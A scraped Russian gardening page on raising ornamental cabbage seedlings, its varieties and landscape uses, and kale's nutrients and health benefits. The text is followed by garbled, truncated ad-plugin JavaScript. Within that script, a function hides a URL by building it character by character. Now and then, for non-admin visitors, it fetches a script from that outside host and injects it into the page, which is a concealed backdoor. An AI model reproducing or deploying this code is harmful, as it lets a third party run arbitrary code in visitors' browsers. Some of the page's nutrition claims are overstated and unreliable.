Выращивают только рассадой. Семена высевают на рассаду в стандартные сроки — конец марта. Землю перед посевом хорошо поливают, полить может также после посева. При обычной комнатной температуре (18-20°С) всходы появляются быстро — через 3-5 ней. При появлении всходов тщательно следят за влажностью, при избыточном поливе высока вероятность поражения рассады черной ножкой. Поэтому едва появившиеся всходы только слегка опрыскивают при необходимости. Полноценный полив только когда рассада станет более крепкой. Оптимальная температура для выращивания рассады капусты — прохладная — 12-16°С. Рассаду подкармливают: один раз при появлении второго настоящего листа, второй — за 2 недели до посадки в открытый грунт.

Некоторые сорта (например, из серии Coral) можно сеять позже — с апреля по июнь в любое удобное время. Растение быстрорастущее, к тому же такой поздний посев исключит риск вытягивания посевов. При этом все равно при выращивании рассады следует соблюдать прохладные условия.

Опытные садоводы рекомендуют вообще не выращивать рассаду декоративной капусты на подоконнике — слишком сложно избежать вытягивания рассады или встречи с «черной ножкой». Намного лучше посеять семена в прохладный уличный парник, ориентировочно в середине-конце апреля (в зависимости от региона).

Растения можно высаживать в открытый грунт в возрасте 35-40 дней (от появления всходов).

Расстояние между растениями зависит от сорта, для среднерослых — 25-40 см, для очень крупных — до 60 см.

  1. Чтобы получить ровное ковровое покрытие, растение на клумбы высаживают в шахматном порядке.
  2. Ровными одиночными рядами.
  3. Волнами.
  4. Из растения разных расцветок, но из оной сортосерии, можно создавать декоративные панно, например, выложить рисунок в виде сердца.

Пересадку саженцы декоративной капусты переносят хорошо, быстро принимаются, поэтому можно пересаживать растения несколько раз за сезон.

Сорта, разнообразие форм и окрасок на фото

В Японии пользуются популярностью миниатюрные формы декоративной капусты, хорошо ветвящиеся, действительно похожие на крупные розы, они отлично смотрятся в букетах и композициях: напольных, настенных, настольных. Из них формируют даже бонсай. Также популярны хорошо вытягивающиеся, колоновидные формы декоративной капусты, в композициях они выглядят фантастически.

Сортогруппы японской селекции и другие:

  1. Токио — растения компактные, до 45 см. высотой, форма листьев округлая, с ненавязчиво волнистым краем. Окраска контрастная — нижние листья зеленые, центральные полностью белые, розовые, или насыщенно бордовые.
  2. Осака — это рослые разновидности, до 60 см. высотой, в остальном растение похоже на Токио. Листья простые, собраны в крупную розетку ярких контрастных расцветок.
  3. Нагойя — отличаются кружевным, сильного гофрированным краем. Розетки очень крупные, до 60 см.
  4. Крейн — это миниатюрные «розочки» по несколько штук на одном стебле.

Существуют срезочные сорта, то есть сорта, которые отлично смотрятся с удаленными нижними листьями — такие растения напоминают крупные цветы-розы на мощном стебле. Вполне уместны в вазе или в композициях на клумбе. Для срезки хороши сорта «Санрайз» (восход), «Сансет» (закат).

В нашей стране производители активно предлагают смеси окрасок:

  1. «Русский круг» — нарядная, ситцевая смесь, некрупные растения с аккуратными розетками, сформированными из простых округлых листьев бело-зелено-розово-бордовых расцветок. Компактная, до 30 см. высотой, хороший выбор для ковровых покрытий, одиночно также смотрится аккуратно и нежно.
  2. «Павлиний хвост» (на нее же похож сорт «Салют» от Гавриш) — глубоко рассеченные, ажурные листья, создающие впечатление, что из обычных капустных листьев выбрали всю «мякоть», оставив только прожилки. Расцветки контрастные, примерно такие же, как у сортов серии Токио.

Хорошие партнеры для декоративной капусты:

  1. бегонии вечноцветущие,
  2. цинерарии,
  3. хризантемы,
  4. астры,
  5. цикламены — эта культура и декоративная капуста любят одинаковые условия.

Применение в ландшафтном дизайне

Применение декоративной капусты достаточно разнообразно:

  1. Ковровые клумбы, рабатки. Есть сорта декоративной капусты, которые смотрятся лучше в одиночной посадке, однако большинство из них идеальны для групповых, ковровых посадок.
  2. Одиночные посадки и посадки в малых группах. Это крупное и сочное растение, мгновенно привлекающее внимание, поэтому лучшим местом будут центральные точки клумбы с однолетними цветами. Комбинируют также с многолетниками, разбавляя группы других габаритных растений.
  3. Кадки, вазоны, контейнеры. Подойдут емкости из любых материалов, в том числе керамические, но лучше всего смотрятся монументальные кадки и вазоны: например, деревянные. При наступлении сильных холодов растения можно занести в помещения, что значительно продлит срок их жизни. Многие сорта сохраняют декоративность до декабря. Конечно, для дома лучше всего подходят миниатюрные сорта, вроде сортов из серии Крейн.
  4. Бордюры — получатся очень нарядными, мощными, выразительными. Кроме того, они просты в создании. Чтобы высадить довольно крупный бордюр, потребуется всего несколько десятков растений.
  5. После луковичных. Это извечная проблема, чем закрыть оголившуюся землю после цветения тюльпанов, нарциссов и других луковичных. Рассада декоративной капусты хорошо переносит пересадку и ею можно быстро задекорировать нужный участок в любое время лета.

Капуста кале состав

По своему химическому составу такой вид капусты совершенно не уступает белковой пище. А это может стать настоящей находкой для тех, кто является приверженцем вегетарианства и постоянно ищет возможности потребления растительной пищи, не уступающей по содержанию белка животного происхождения.

На основании исследований, дикая и культивируемая разновидности кейль богаты:

  • витамином А и синтезируемым организмом бета каротином, образующим группу каротиноидов, в частности лютеин;
  • витамином К (его сложно найти в продуктах);
  • антиоксидантным витамином С (натуральная аскорбиновая кислота);
  • некоторыми витаминами из группы В (например, В1, В2, В6);
  • токоферолом (известен как жирорастворимый витамин Е);
  • фолиевой кислотой;
  • белками, жирами и углеводами;
  • заменимыми и незаменимыми аминокислотами, обычно содержатся в мясе животных;
  • омега-3 жирными кислотами (они обнаруживаются лишь в морских сортах рыбы);
  • противораковым веществом сульфорафаном;
  • 45 различными флавоноидами;
  • кверодцетином и кампферолом;
  • минеральными веществами, более всего представленными магнием, кальцием (его содержание больше, чем в молоке), калием, фосфором, натрием, медью и железом.

Общая калорийность 100 граммов капусты составляет от 30 до 50 калорий, что выводит кале в список низкокалорийных и одновременно питательных продуктов.

Капуста кале полезные свойства

По мнению медиков и диетологов, редкая капуста кале благотворно влияет на человеческий организм за счет:
  • сочетания бета каротина, витамина С и флавоноидов. Эту капусту относят к мощнейшим антиоксидантам;
  • огромного количества витамина С, способствующего синтезу коллагена;
  • способности снижать уровень холестерина в крови;
  • профилактики развития сердечно-сосудистых заболеваний и появления риска инфаркта;
  • наличия редкого витамина К, необходимого для свертывания крови;
  • содержания в листьях капусты лютеина и зеаксантина, которые поддерживают здоровье глаз;
  • низкой калорийности и высокой питательности, она помогает сбросить лишний вес, наполнив организм витаминами и минералами;
  • наличия сульфорафана (снижается риск развития окологических опухолевых болезней).
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};